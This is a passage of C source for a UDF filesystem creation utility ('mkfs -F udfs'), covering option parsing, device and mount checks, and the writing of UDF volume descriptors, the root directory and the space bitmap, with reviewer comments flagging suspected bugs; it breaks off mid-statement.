/* NOTE(review): UMASK appears unused in this chunk -- confirm callers. */
#define UMASK 0755
/* True for zero or any power of two (zero case is harmless here). */
#define POWEROF2(num) (((num) & ((num) - 1)) == 0)
#define MB (1024*1024)
/*
 * Forward declarations
 */
static void rdfs(daddr_t bno, int size, char *bf);
static void wtfs(daddr_t bno, int size, char *bf);
static void dump_fscmd(char *fsys, int fsi);
static int32_t number(long big, char *param);
static void usage();
static int match(char *s);
static int readvolseq();
static uint32_t get_last_block();
/*
 * variables set up by front end.
 */
static int Nflag = 0;		/* run mkfs without writing */
				/* file system */
static int mflag = 0;		/* return the command line used */
				/* to create this FS */
static int fssize;		/* file system size */
static uint32_t disk_size;	/* partition size from VTOC */
static uint32_t unused;		/* unused sectors in partition */
static int sectorsize = 2048;	/* bytes/sector default */
				/* If nothing specified */
static char *fsys;		/* special device name (argv[0] after getopt) */
static int fsi;			/* fd for reading the raw device */
static int fso;			/* fd for writing (same as fsi under -N) */
#define BIG LONG_MAX
static uint32_t number_flags = 0;	/* parse state shared with number() */
static char *string;		/* cursor into the current -o suboption */
static void setstamp(tstamp_t *);
static void setextad(extent_ad_t *, uint32_t, uint32_t);
static void setdstring(dstring_t *, char *, int32_t);
static void wtvolseq(tag_t *, daddr_t, daddr_t);
static void volseqinit();
static void setstamp(tstamp_t *);
static uint32_t get_bsize();
/* Fixed on-disk layout constants (sector numbers / lengths). */
#define VOLRECSTART (32 * 1024)
#define VOLSEQSTART 128
#define VOLSEQLEN 16
#define INTSEQSTART 192
#define INTSEQLEN 8192
#define FIRSTAVDP 256
#define AVDPLEN 1
#define FILESETLEN 2
#define SPACEMAP_OFF 24
#define MAXID 16
static time_t mkfstime;		/* creation time, stamped into descriptors */
static struct tm res;		/* broken-down mkfstime (local time) */
static long tzone;		/* minutes west of UTC for setstamp() */
static char vsibuf[128];
/* Entity identifiers written into the various descriptors. */
static regid_t sunmicro = { 0, "*SUN SOLARIS UDF", 4, 2 };
static regid_t lvinfo = { 0, "*UDF LV Info", 0x50, 0x1, 4, 2 };
static regid_t partid = { 0, "+NSR02", 0 };
static regid_t udf_compliant = { 0, "*OSTA UDF Compliant", 0x50, 0x1, 0 };
static uint8_t osta_unicode[] = "OSTA Compressed Unicode";
static int bdevismounted;
static int ismounted;
static int directory;
static char buf[MAXBSIZE];	/* descriptor under construction */
static char buf2[MAXBSIZE];	/* scratch copy for the main-sequence write */
static char lvid[MAXBSIZE];	/* logical volume integrity descriptor */
uint32_t ecma_version = 2;
static int serialnum = 1;	/* Tag serial number */
static char udfs_label[128] = "*NoLabel*";
static int acctype = PART_ACC_OW;
static uint32_t part_start;	/* first sector of the partition */
static uint32_t part_len;	/* partition length in sectors */
static uint32_t part_bmp_bytes;
static uint32_t part_bmp_sectors;
static int32_t part_unalloc = -1;	/* logical block of space bitmap, -1 = none */
static uint32_t filesetblock;
/* Set by readvolseq for -m option */
static uint32_t oldfssize;
static char *oldlabel;
/*
 * mkfs -F udfs entry point.
 *
 * Parses -F/-V/-m/-o getopt options plus "special [size]" operands,
 * validates the target device and size, then lays down the UDF
 * volume recognition/descriptor sequences via volseqinit().
 * All failures exit(32); -m and -N exit(0) early without writing.
 */
int
main(int32_t argc, int8_t *argv[])
{
	long i;
	FILE *mnttab;
	struct mnttab mntp;
	char *special, *raw_special;
	struct stat statarea;
	struct ustat ustatarea;
	int32_t c;
	uint32_t temp_secsz;
	int isfs;
	(void) setlocale(LC_ALL, "");
#if !defined(TEXT_DOMAIN)
#define TEXT_DOMAIN "SYS_TEST"
#endif
	(void) textdomain(TEXT_DOMAIN);
	while ((c = getopt(argc, argv, "F:Vmo:")) != EOF) {
		switch (c) {
		case 'F':
			/* Only "udfs" is accepted for -F. */
			string = optarg;
			if (strcmp(string, "udfs") != 0) {
				usage();
			}
			break;
		case 'V':
			{
				/* Echo the command line being executed. */
				char *opt_text;
				int opt_count;
				(void) fprintf(stdout,
				    gettext("mkfs -F udfs "));
				for (opt_count = 1; opt_count < argc;
				    opt_count++) {
					opt_text = argv[opt_count];
					if (opt_text) {
						(void) fprintf(stdout,
						    " %s ", opt_text);
					}
				}
				(void) fprintf(stdout, "\n");
			}
			break;
		case 'm':
			/*
			 * return command line used
			 * to create this FS
			 */
			mflag++;
			break;
		case 'o':
			/*
			 * udfs specific options.
			 */
			string = optarg;
			/* match()/number() advance the global "string". */
			while (*string != '\0') {
				if (match("N")) {
					Nflag++;
				} else if (match("psize=")) {
					number_flags = 0;
					sectorsize = number(BIG,
					    "psize");
				} else if (match("label=")) {
					/* Labels are capped at 31 chars. */
					for (i = 0; i < 31; i++) {
						if (*string == '\0') {
							break;
						}
						udfs_label[i] =
						    *string++;
					}
					udfs_label[i] = '\0';
				} else if (*string == '\0') {
					break;
				} else {
					(void) fprintf(stdout,
					    gettext("illegal "
					    "option: %s\n"),
					    string);
					usage();
				}
				if (*string == ',') {
					string++;
				}
				if (*string == ' ') {
					string++;
				}
			}
			break;
		case '?':
			usage();
			break;
		}
	}
	(void) time(&mkfstime);
	if (optind > (argc - 1)) {
		usage();
	}
	argc -= optind;
	argv = &argv[optind];
	fsys = argv[0];
	/*
	 * NOTE(review): getfullrawname() can return NULL/"" on failure;
	 * the result is passed straight to open() -- confirm this is safe.
	 */
	raw_special = getfullrawname(fsys);
	fsi = open(raw_special, 0);
	if (fsi < 0) {
		(void) fprintf(stdout,
		    gettext("%s: cannot open\n"), fsys);
		exit(32);
	}
	fso = fsi;
	/* Let the device report its native sector size, if it can. */
	if ((temp_secsz = get_bsize()) != 0) {
		sectorsize = temp_secsz;
	}
	/* Get old file system information */
	isfs = readvolseq();
	if (mflag) {
		/*
		 * Figure out the block size and
		 * file system size and print the information
		 */
		if (isfs)
			dump_fscmd(fsys, fsi);
		else
			(void) printf(gettext(
			    "[not currently a valid file system]\n"));
		exit(0);
	}
	/*
	 * Get the disk size from the drive or VTOC for the N and N-256
	 * AVDPs and to make sure we don't want to create a file system
	 * bigger than the partition.
	 */
	disk_size = get_last_block();
	if (argc < 2 && disk_size == 0 || argc < 1) {
		usage();
	}
	if (argc < 2) {
		(void) printf(gettext("No size specified, entire partition "
		    "of %u sectors used\n"), disk_size);
		fssize = disk_size;
	} else {
		string = argv[1];
		number_flags = 0;
		fssize = number(BIG, "size");
	}
	if (fssize < 0) {
		(void) fprintf(stderr,
		    gettext("Negative number of sectors(%d) not allowed\n"),
		    fssize);
		exit(32);
	}
	/* Sizes here are in DEV_BSIZE (512-byte) sectors. */
	if (fssize < (512 * sectorsize / DEV_BSIZE)) {
		(void) fprintf(stdout,
		    gettext("size should be at least %d sectors\n"),
		    (512 * sectorsize / DEV_BSIZE));
		exit(32);
	}
	if (disk_size != 0) {
		if (fssize > disk_size) {
			(void) fprintf(stderr, gettext("Invalid size: %d "
			    "larger than the partition size\n"), fssize);
			exit(32);
		} else if (fssize < disk_size) {
			unused = disk_size - fssize;
			(void) printf(
			    gettext("File system size %d smaller than "
			    "partition, %u sectors unused\n"),
			    fssize, unused);
		}
	} else {
		/* Use passed-in size */
		disk_size = fssize;
	}
	if (!Nflag) {
		special = getfullblkname(fsys);
		/*
		 * If we found the block device name,
		 * then check the mount table.
		 * if mounted, write lock the file system
		 *
		 */
		if ((special != NULL) && (*special != '\0')) {
			/*
			 * NOTE(review): fopen(MNTTAB) result is not checked;
			 * getmntent(NULL, ...) would be undefined -- confirm.
			 */
			mnttab = fopen(MNTTAB, "r");
			while ((getmntent(mnttab, &mntp)) == 0) {
				if (strcmp(special, mntp.mnt_special) == 0) {
					(void) fprintf(stdout,
					    gettext("%s is mounted,"
					    " can't mkfs\n"), special);
					exit(32);
				}
			}
			(void) fclose(mnttab);
		}
		if ((bdevismounted) && (ismounted == 0)) {
			(void) fprintf(stdout,
			    gettext("can't check mount point; "));
			(void) fprintf(stdout,
			    gettext("%s is mounted but not in mnttab(4)\n"),
			    special);
			exit(32);
		}
		if (directory) {
			if (ismounted == 0) {
				(void) fprintf(stdout,
				    gettext("%s is not mounted\n"),
				    special);
				exit(32);
			}
		}
		fso = creat(fsys, 0666);
		if (fso < 0) {
			(void) fprintf(stdout,
			    gettext("%s: cannot create\n"), fsys);
			exit(32);
		}
		if (stat(fsys, &statarea) < 0) {
			(void) fprintf(stderr,
			    gettext("%s: %s: cannot stat\n"),
			    argv[0], fsys);
			exit(32);
		}
		if (ustat(statarea.st_rdev, &ustatarea) >= 0) {
			(void) fprintf(stderr,
			    gettext("%s is mounted, can't mkfs\n"), fsys);
			exit(32);
		}
	} else {
		/*
		 * For the -N case, a file descriptor is needed for the llseek()
		 * in wtfs(). See the comment in wtfs() for more information.
		 *
		 * Get a file descriptor that's read-only so that this code
		 * doesn't accidentally write to the file.
		 */
		fso = open(fsys, O_RDONLY);
		if (fso < 0) {
			(void) fprintf(stderr, gettext("%s: cannot open\n"),
			    fsys);
			exit(32);
		}
	}
	/*
	 * Validate the given file system size.
	 * Verify that its last block can actually be accessed.
	 */
	/* Convert fssize from DEV_BSIZE units to file-system sectors. */
	fssize = fssize / (sectorsize / DEV_BSIZE);
	if (fssize <= 0) {
		(void) fprintf(stdout,
		    gettext("preposterous size %d. sectors\n"), fssize);
		exit(32);
	}
	fssize --;
	/*
	 * verify device size
	 */
	rdfs(fssize - 1, sectorsize, buf);
	if ((sectorsize < DEV_BSIZE) ||
	    (sectorsize > MAXBSIZE)) {
		/* NOTE(review): reports the error but does not exit -- confirm. */
		(void) fprintf(stdout,
		    gettext("sector size must be"
		    " between 512, 8192 bytes\n"));
	}
	if (!POWEROF2(sectorsize)) {
		(void) fprintf(stdout,
		    gettext("sector size must be a power of 2, not %d\n"),
		    sectorsize);
		exit(32);
	}
	if (Nflag) {
		exit(0);
	}
	(void) printf(gettext("Creating file system with sector size of "
	    "%d bytes\n"), sectorsize);
	/*
	 * Set up time stamp values
	 */
	mkfstime = time(0);
	(void) localtime_r(&mkfstime, &res);
	if (res.tm_isdst > 0) {
		tzone = altzone / 60;
	} else if (res.tm_isdst == 0) {
		/*
		 * NOTE(review): "tzone" is the zero-initialized static, so
		 * this always yields 0; likely meant "timezone / 60" --
		 * confirm against tzset(3C).
		 */
		tzone = tzone / 60;
	} else {
		tzone = 2047;	/* Unknown */
	}
	/*
	 * Initialize the volume recognition sequence, the volume descriptor
	 * sequences and the anchor pointer.
	 */
	volseqinit();
	(void) fsync(fso);
	(void) close(fsi);
	(void) close(fso);
	return (0);
}
/*
 * Fill in a UDF timestamp from the cached mkfs time (global "res",
 * a broken-down local time) and the minutes-west offset (global "tzone").
 */
static void
setstamp(tstamp_t *tp)
{
	/* Sub-second precision is not recorded. */
	tp->ts_csec = 0;
	tp->ts_husec = 0;
	tp->ts_usec = 0;

	tp->ts_year = 1900 + res.tm_year;
	tp->ts_month = res.tm_mon + 1;	/* tm_mon is zero-based */
	tp->ts_day = res.tm_mday;
	tp->ts_hour = res.tm_hour;
	tp->ts_min = res.tm_min;
	tp->ts_sec = res.tm_sec;

	/* Type-1 (local time) stamp: 0x1000 plus 12-bit offset field. */
	tp->ts_tzone = 0x1000 + (-tzone & 0xFFF);
}
/*
 * Initialize an extent descriptor: byte length and starting sector.
 */
static void
setextad(extent_ad_t *eap, uint32_t len, uint32_t loc)
{
	eap->ext_loc = loc;
	eap->ext_len = len;
}
/*
 * Store "cp" into the fixed-size dstring "dp" (len bytes total) as
 * OSTA Compressed Unicode: byte 0 holds the compression id (8 = 8-bit),
 * bytes 1..len-2 the (possibly truncated) characters, and the final
 * byte the recorded length including the compression id.
 */
static void
setdstring(dstring_t *dp, char *cp, int len)
{
	int32_t nchars;

	bzero(dp, len);
	nchars = strlen(cp);
	if (nchars > len - 3) {
		nchars = len - 3;	/* leave room for id + length byte */
	}
	dp[len - 1] = nchars + 1;	/* length byte counts the id too */
	dp[0] = 8;			/* 8-bit compression id */
	(void) strncpy(&dp[1], cp, len - 2);
}
static void
wtvolseq(tag_t *tp, daddr_t blk1, daddr_t blk2)
{
static uint32_t vdsn = 0;
tp->tag_loc = blk1;
switch (tp->tag_id) {
case UD_PRI_VOL_DESC :
((struct pri_vol_desc *)tp)->pvd_vdsn = vdsn++;
break;
case UD_VOL_DESC_PTR :
((struct vol_desc_ptr *)tp)->vdp_vdsn = vdsn++;
break;
case UD_IMPL_USE_DESC :
((struct iuvd_desc *)tp)->iuvd_vdsn = vdsn++;
break;
case UD_PART_DESC :
((struct part_desc *)tp)->pd_vdsn = vdsn++;
break;
case UD_LOG_VOL_DESC :
((struct log_vol_desc *)tp)->lvd_vdsn = vdsn++;
break;
case UD_UNALL_SPA_DESC :
((struct unall_spc_desc *)tp)->ua_vdsn = vdsn++;
break;
}
bzero(buf2, sectorsize);
/* LINTED */
maketag(tp, (struct tag *)buf2);
/*
* Write at Main Volume Descriptor Sequence
*/
wtfs(blk1, sectorsize, buf2);
tp->tag_loc = blk2;
switch (tp->tag_id) {
case UD_PRI_VOL_DESC :
((struct pri_vol_desc *)tp)->pvd_vdsn = vdsn++;
break;
case UD_VOL_DESC_PTR :
((struct vol_desc_ptr *)tp)->vdp_vdsn = vdsn++;
break;
case UD_IMPL_USE_DESC :
((struct iuvd_desc *)tp)->iuvd_vdsn = vdsn++;
break;
case UD_PART_DESC :
((struct part_desc *)tp)->pd_vdsn = vdsn++;
break;
case UD_LOG_VOL_DESC :
((struct log_vol_desc *)tp)->lvd_vdsn = vdsn++;
break;
case UD_UNALL_SPA_DESC :
((struct unall_spc_desc *)tp)->ua_vdsn = vdsn++;
break;
}
maketag(tp, tp);
/*
* Write at Reserve Volume Descriptor Sequence
*/
wtfs(blk2, sectorsize, buf);
}
/*
 * Lay down the entire on-disk structure of the new file system:
 * BEA01/NSR02/TEA01 recognition sequence, the main and reserve volume
 * descriptor sequences (PVD, IUVD, PD, LVD, USD, TD), the anchor volume
 * descriptor pointers, the file set descriptor, the root file entry and
 * directory, the partition space bitmap, and the logical volume
 * integrity sequence.  Uses the file-scope globals set up by main().
 */
static void
volseqinit()
{
	struct tag *tp;
	struct nsr_desc *nsp;
	struct pri_vol_desc *pvdp;
	struct iuvd_desc *iudp;
	struct part_desc *pp;
	struct phdr_desc *php;
	struct log_vol_desc *lvp;
	long_ad_t *lap;
	struct pmap_typ1 *pmp;
	struct unall_spc_desc *uap;
	struct log_vol_int_desc *lvip;
	struct term_desc *tdp;
	struct anch_vol_desc_ptr *avp;
	struct lvid_iu *lviup;
	struct file_set_desc *fsp;
	struct file_entry *fp;
	struct icb_tag *icb;
	struct short_ad *sap;
	struct file_id *fip;
	struct space_bmap_desc *sbp;
	uint8_t *cp;
	daddr_t nextblock, endblock;
	int32_t volseq_sectors, nextlogblock, rootfelen, i;
	uint32_t mvds_loc, rvds_loc;
	bzero(buf, MAXBSIZE);
	/*
	 * Starting from MAXBSIZE, clear out till 256 sectors.
	 */
	for (i = MAXBSIZE / sectorsize; i < FIRSTAVDP; i++) {
		wtfs(i, sectorsize, buf);
	}
	/* Zero out the avdp at N - 257 */
	/* NOTE(review): comment says N-257 but the write is at fssize-256. */
	wtfs(fssize - 256, sectorsize, buf);
	/*
	 * Leave 1st 32K for O.S.
	 */
	nextblock = VOLRECSTART / sectorsize;
	/*
	 * Write BEA01/NSR02/TEA01 sequence.
	 * Each one must be 2K bytes in length.
	 */
	nsp = (struct nsr_desc *)buf;
	nsp->nsr_str_type = 0;
	nsp->nsr_ver = 1;
	(void) strncpy((int8_t *)nsp->nsr_id, "BEA01", 5);
	nsp = (struct nsr_desc *)&buf[2048];
	nsp->nsr_str_type = 0;
	nsp->nsr_ver = 1;
	(void) strncpy((int8_t *)nsp->nsr_id, "NSR02", 5);
	nsp = (struct nsr_desc *)&buf[4096];
	nsp->nsr_str_type = 0;
	nsp->nsr_ver = 1;
	(void) strncpy((int8_t *)nsp->nsr_id, "TEA01", 5);
	wtfs(nextblock, 8192, buf);
	bzero(buf, MAXBSIZE);
	/*
	 * Minimum length of volume sequences
	 */
	volseq_sectors = 16;
	/*
	 * Round up to next 32K boundary for
	 * volume descriptor sequences
	 */
	nextblock = VOLSEQSTART;
	bzero(buf, sectorsize);
	mvds_loc = VOLSEQSTART;
	rvds_loc = mvds_loc + volseq_sectors;
	/*
	 * Primary Volume Descriptor
	 */
	/* LINTED */
	pvdp = (struct pri_vol_desc *)buf;
	tp = &pvdp->pvd_tag;
	tp->tag_id = UD_PRI_VOL_DESC;
	tp->tag_desc_ver = ecma_version;
	tp->tag_sno = serialnum;
	tp->tag_crc_len = sizeof (struct pri_vol_desc) -
	    sizeof (struct tag);
	pvdp->pvd_vdsn = 0;
	pvdp->pvd_pvdn = 0;
	setdstring(pvdp->pvd_vol_id, udfs_label, 32);
	pvdp->pvd_vsn = 1;
	pvdp->pvd_mvsn = 1;
	pvdp->pvd_il = 2;		/* Single-volume */
	pvdp->pvd_mil = 3;		/* Multi-volume */
	pvdp->pvd_csl = 1;		/* CS0 */
	pvdp->pvd_mcsl = 1;		/* CS0 */
	/* Volume set id: creation-time hex stamp followed by the label. */
	(void) sprintf(vsibuf, "%08X", SWAP_32((uint32_t)mkfstime));
	setdstring(pvdp->pvd_vsi, vsibuf, 128);
	(void) strncpy(pvdp->pvd_vsi + 17, udfs_label, 128 - 17);
	setcharspec(&pvdp->pvd_desc_cs, 0, osta_unicode);
	setcharspec(&pvdp->pvd_exp_cs, 0, osta_unicode);
	setextad(&pvdp->pvd_vol_abs, 0, 0);
	setextad(&pvdp->pvd_vcn, 0, 0);
	bzero(&pvdp->pvd_appl_id, sizeof (regid_t));
	setstamp(&pvdp->pvd_time);
	bcopy(&sunmicro, &pvdp->pvd_ii, sizeof (regid_t));
	pvdp->pvd_flags = 0;
	wtvolseq(tp, nextblock, nextblock + volseq_sectors);
	nextblock++;
	/*
	 * Implementation Use Descriptor
	 */
	bzero(buf, sectorsize);
	/* LINTED */
	iudp = (struct iuvd_desc *)buf;
	tp = &iudp->iuvd_tag;
	tp->tag_id = UD_IMPL_USE_DESC;
	tp->tag_desc_ver = ecma_version;
	tp->tag_sno = serialnum;
	tp->tag_crc_len = sizeof (struct iuvd_desc) -
	    sizeof (struct tag);
	iudp->iuvd_vdsn = 0;
	bcopy(&lvinfo, &iudp->iuvd_ii, sizeof (regid_t));
	setcharspec(&iudp->iuvd_cset, 0, osta_unicode);
	setdstring(iudp->iuvd_lvi, udfs_label, 128);
	setdstring(iudp->iuvd_ifo1, "", 36);
	setdstring(iudp->iuvd_ifo2, "", 36);
	setdstring(iudp->iuvd_ifo3, "", 36);
	/*
	 * info1,2,3 = user specified
	 */
	bcopy(&sunmicro, &iudp->iuvd_iid, sizeof (regid_t));
	wtvolseq(tp, nextblock, nextblock + volseq_sectors);
	nextblock++;
	/*
	 * Partition Descriptor
	 */
	bzero(buf, sectorsize);
	/* LINTED */
	pp = (struct part_desc *)buf;
	tp = &pp->pd_tag;
	tp->tag_id = UD_PART_DESC;
	tp->tag_desc_ver = ecma_version;
	tp->tag_sno = serialnum;
	tp->tag_crc_len = sizeof (struct part_desc) -
	    sizeof (struct tag);
	pp->pd_vdsn = 0;
	pp->pd_pflags = 1;		/* Allocated */
	pp->pd_pnum = 0;
	bcopy(&partid, &pp->pd_pcontents, sizeof (regid_t));
	/* Partition covers everything after the first AVDP. */
	part_start = FIRSTAVDP + AVDPLEN;
	part_len = fssize - part_start;
	part_bmp_bytes = (part_len + NBBY - 1) / NBBY;
	part_bmp_sectors = (part_bmp_bytes + SPACEMAP_OFF + sectorsize - 1) /
	    sectorsize;
	pp->pd_part_start = part_start;
	pp->pd_part_length = part_len;
	pp->pd_acc_type = acctype;
	nextlogblock = 0;		/* logical blocks are partition-relative */
	/*
	 * Do the partition header
	 */
	/* LINTED */
	php = (struct phdr_desc *)&pp->pd_pc_use;
	/*
	 * Set up unallocated space bitmap
	 */
	if (acctype == PART_ACC_RW || acctype == PART_ACC_OW) {
		php->phdr_usb.sad_ext_len =
		    (part_bmp_bytes + SPACEMAP_OFF + sectorsize - 1) &
		    (~(sectorsize - 1));
		php->phdr_usb.sad_ext_loc = nextlogblock;
		part_unalloc = nextlogblock;
		nextlogblock += part_bmp_sectors;
	}
	bcopy(&sunmicro, &pp->pd_ii, sizeof (regid_t));
	wtvolseq(tp, nextblock, nextblock + volseq_sectors);
	nextblock++;
	/*
	 * Logical Volume Descriptor
	 */
	bzero(buf, sectorsize);
	/* LINTED */
	lvp = (struct log_vol_desc *)buf;
	tp = &lvp->lvd_tag;
	tp->tag_id = UD_LOG_VOL_DESC;
	tp->tag_desc_ver = ecma_version;
	tp->tag_sno = serialnum;
	tp->tag_crc_len = sizeof (struct log_vol_desc) -
	    sizeof (struct tag);
	lvp->lvd_vdsn = 0;
	setcharspec(&lvp->lvd_desc_cs, 0, osta_unicode);
	setdstring(lvp->lvd_lvid, udfs_label, 128);
	lvp->lvd_log_bsize = sectorsize;
	bcopy(&udf_compliant, &lvp->lvd_dom_id, sizeof (regid_t));
	lap = (long_ad_t *)&lvp->lvd_lvcu;
	lap->lad_ext_len = FILESETLEN * sectorsize;
	filesetblock = nextlogblock;	/* file set descriptor goes here */
	lap->lad_ext_loc = nextlogblock;
	lap->lad_ext_prn = 0;
	lvp->lvd_mtbl_len = 6;
	lvp->lvd_num_pmaps = 1;
	bcopy(&sunmicro, &lvp->lvd_ii, sizeof (regid_t));
	/* Single type-1 partition map. */
	/* LINTED */
	pmp = (struct pmap_typ1 *)&lvp->lvd_pmaps;
	pmp->map1_type = 1;
	pmp->map1_length = 6;
	pmp->map1_vsn = SWAP_16(1);
	pmp->map1_pn = 0;
	tp->tag_crc_len = (char *)(pmp + 1) - buf - sizeof (struct tag);
	setextad(&lvp->lvd_int_seq_ext, INTSEQLEN, INTSEQSTART);
	wtvolseq(tp, nextblock, nextblock + volseq_sectors);
	nextblock++;
	/*
	 * Unallocated Space Descriptor
	 */
	bzero(buf, sectorsize);
	/* LINTED */
	uap = (struct unall_spc_desc *)buf;
	tp = &uap->ua_tag;
	tp->tag_id = UD_UNALL_SPA_DESC;
	tp->tag_desc_ver = ecma_version;
	tp->tag_sno = serialnum;
	uap->ua_vdsn = 0;
	uap->ua_nad = 0;		/* no free extents recorded */
	tp->tag_crc_len = (char *)uap->ua_al_dsc - buf - sizeof (struct tag);
	wtvolseq(tp, nextblock, nextblock + volseq_sectors);
	nextblock++;
	/*
	 * Terminating Descriptor
	 */
	bzero(buf, sectorsize);
	/* LINTED */
	tdp = (struct term_desc *)buf;
	tp = &tdp->td_tag;
	tp->tag_id = UD_TERM_DESC;
	tp->tag_desc_ver = ecma_version;
	tp->tag_sno = serialnum;
	tp->tag_crc_len = sizeof (struct term_desc) -
	    sizeof (struct tag);
	tp->tag_loc = nextblock;
	wtvolseq(tp, nextblock, nextblock + volseq_sectors);
	nextblock++;
	/*
	 * Do the anchor volume descriptor
	 */
	if (nextblock > FIRSTAVDP) {
		(void) fprintf(stdout,
		    gettext("Volume integrity sequence"
		    " descriptors too long\n"));
		exit(32);
	}
	nextblock = FIRSTAVDP;
	bzero(buf, sectorsize);
	/* LINTED */
	avp = (struct anch_vol_desc_ptr *)buf;
	tp = &avp->avd_tag;
	tp->tag_id = UD_ANCH_VOL_DESC;
	tp->tag_desc_ver = ecma_version;
	tp->tag_sno = serialnum;
	tp->tag_crc_len = sizeof (struct anch_vol_desc_ptr) -
	    sizeof (struct tag);
	tp->tag_loc = nextblock;
	setextad(&avp->avd_main_vdse,
	    volseq_sectors * sectorsize, mvds_loc);
	setextad(&avp->avd_res_vdse,
	    volseq_sectors * sectorsize, rvds_loc);
	bzero(buf2, sectorsize);
	/* LINTED */
	maketag(tp, (struct tag *)buf2);
	wtfs(nextblock, sectorsize, buf2);
	nextblock++;
	/* Second AVDP copy at the last sector (fssize). */
	tp->tag_loc = fssize;
	/* LINTED */
	maketag(tp, (struct tag *)buf2);
	wtfs(fssize, sectorsize, buf2);
	/*
	 * File Set Descriptor
	 */
	bzero(buf, sectorsize);
	/* LINTED */
	fsp = (struct file_set_desc *)&buf;
	tp = &fsp->fsd_tag;
	tp->tag_id = UD_FILE_SET_DESC;
	tp->tag_desc_ver = ecma_version;
	tp->tag_sno = serialnum;
	tp->tag_crc_len = sizeof (struct file_set_desc) -
	    sizeof (struct tag);
	tp->tag_loc = nextlogblock;
	setstamp(&fsp->fsd_time);
	fsp->fsd_ilevel = 3;
	fsp->fsd_mi_level = 3;
	fsp->fsd_cs_list = 1;
	fsp->fsd_mcs_list = 1;
	fsp->fsd_fs_no = 0;
	fsp->fsd_fsd_no = 0;
	setcharspec(&fsp->fsd_lvidcs, 0, osta_unicode);
	setdstring(fsp->fsd_lvid, udfs_label, 128);
	setcharspec(&fsp->fsd_fscs, 0, osta_unicode);
	setdstring(fsp->fsd_fsi, udfs_label, 32);
	setdstring(fsp->fsd_cfi, "", 32);
	setdstring(fsp->fsd_afi, "", 32);
	/* Root directory ICB immediately follows the file set extent. */
	lap = (long_ad_t *)&fsp->fsd_root_icb;
	lap->lad_ext_len = sectorsize;
	lap->lad_ext_loc = filesetblock + FILESETLEN;
	lap->lad_ext_prn = 0;
	bcopy(&udf_compliant, &fsp->fsd_did, sizeof (regid_t));
	maketag(tp, tp);
	wtfs(nextlogblock + part_start, sectorsize, (char *)tp);
	nextlogblock++;
	/*
	 * Terminating Descriptor
	 */
	bzero(buf, sectorsize);
	/* LINTED */
	tdp = (struct term_desc *)buf;
	tp = &tdp->td_tag;
	tp->tag_id = UD_TERM_DESC;
	tp->tag_desc_ver = ecma_version;
	tp->tag_sno = serialnum;
	tp->tag_crc_len = sizeof (struct term_desc) -
	    sizeof (struct tag);
	tp->tag_loc = nextlogblock;
	maketag(tp, tp);
	wtfs(nextlogblock + part_start, sectorsize, (char *)tp);
	nextlogblock++;
	if (nextlogblock > filesetblock + FILESETLEN) {
		(void) fprintf(stdout,
		    gettext("File set descriptor too long\n"));
		exit(32);
	}
	nextlogblock = filesetblock + FILESETLEN;
	/*
	 * Root File Entry
	 */
	bzero(buf, sectorsize);
	/* LINTED */
	fp = (struct file_entry *)&buf;
	tp = &fp->fe_tag;
	tp->tag_id = UD_FILE_ENTRY;
	tp->tag_desc_ver = ecma_version;
	tp->tag_sno = serialnum;
	tp->tag_loc = nextlogblock;
	icb = &fp->fe_icb_tag;
	icb->itag_prnde = 0;
	icb->itag_strategy = STRAT_TYPE4;
	icb->itag_param = 0;	/* what does this mean? */
	icb->itag_max_ent = 1;
	icb->itag_ftype = FTYPE_DIRECTORY;
	icb->itag_lb_loc = 0;
	icb->itag_lb_prn = 0;
	icb->itag_flags = ICB_FLAG_ARCHIVE;
	fp->fe_uid = getuid();
	fp->fe_gid = getgid();
	/* drwxr-xr-x equivalent in the UDF permission encoding. */
	fp->fe_perms = (0x1f << 10) | (0x5 << 5) | 0x5;
	fp->fe_lcount = 1;
	fp->fe_rec_for = 0;
	fp->fe_rec_dis = 0;
	fp->fe_rec_len = 0;
	fp->fe_info_len = sizeof (struct file_id);
	fp->fe_lbr = 1;
	setstamp(&fp->fe_acc_time);
	setstamp(&fp->fe_mod_time);
	setstamp(&fp->fe_attr_time);
	fp->fe_ckpoint = 1;
	bcopy(&sunmicro, &fp->fe_impl_id, sizeof (regid_t));
	fp->fe_uniq_id = 0;
	fp->fe_len_ear = 0;
	fp->fe_len_adesc = sizeof (short_ad_t);
	/* Single short allocation descriptor pointing at the directory data. */
	/* LINTED */
	sap = (short_ad_t *)(fp->fe_spec + fp->fe_len_ear);
	sap->sad_ext_len = sizeof (struct file_id);
	sap->sad_ext_loc = nextlogblock + 1;
	rootfelen = (char *)(sap + 1) - buf;
	tp->tag_crc_len = rootfelen - sizeof (struct tag);
	maketag(tp, tp);
	wtfs(nextlogblock + part_start, sectorsize, (char *)tp);
	nextlogblock++;
	/*
	 * Root Directory
	 */
	bzero(buf, sectorsize);
	/* LINTED */
	fip = (struct file_id *)&buf;
	tp = &fip->fid_tag;
	tp->tag_id = UD_FILE_ID_DESC;
	tp->tag_desc_ver = ecma_version;
	tp->tag_sno = serialnum;
	tp->tag_crc_len = sizeof (struct file_id) -
	    sizeof (struct tag);
	tp->tag_loc = nextlogblock;
	fip->fid_ver = 1;
	fip->fid_flags = FID_DIR | FID_PARENT;	/* ".." entry only */
	fip->fid_idlen = 0;
	fip->fid_iulen = 0;
	fip->fid_icb.lad_ext_len = sectorsize;	/* rootfelen; */
	fip->fid_icb.lad_ext_loc = nextlogblock - 1;
	fip->fid_icb.lad_ext_prn = 0;
	maketag(tp, tp);
	wtfs(nextlogblock + part_start, sectorsize, (char *)tp);
	nextlogblock++;
	/*
	 * Now do the space bitmaps
	 */
	if (part_unalloc >= 0) {
		int size = sectorsize * part_bmp_sectors;
		sbp = (struct space_bmap_desc *)malloc(size);
		if (!sbp) {
			(void) fprintf(stdout,
			    gettext("Can't allocate bitmap space\n"));
			exit(32);
		}
		bzero((char *)sbp, sectorsize * part_bmp_sectors);
		tp = &sbp->sbd_tag;
		tp->tag_id = UD_SPA_BMAP_DESC;
		tp->tag_desc_ver = ecma_version;
		tp->tag_sno = serialnum;
		tp->tag_crc_len = 0;	/* Don't do CRCs on bitmaps */
		tp->tag_loc = part_unalloc;
		sbp->sbd_nbits = part_len;
		sbp->sbd_nbytes = part_bmp_bytes;
		maketag(tp, tp);
		if (part_unalloc >= 0) {
			int32_t i;
			/*
			 * Mark blocks 0..nextlogblock-1 allocated (bits
			 * clear) and everything after free (bits set);
			 * trim the trailing partial byte to part_len bits.
			 */
			cp = (uint8_t *)sbp + SPACEMAP_OFF;
			i = nextlogblock / NBBY;
			cp[i++] = (0xff << (nextlogblock % NBBY)) & 0xff;
			while (i < part_bmp_bytes)
				cp[i++] = 0xff;
			if (part_len % NBBY)
				cp[--i] = (unsigned)0xff >>
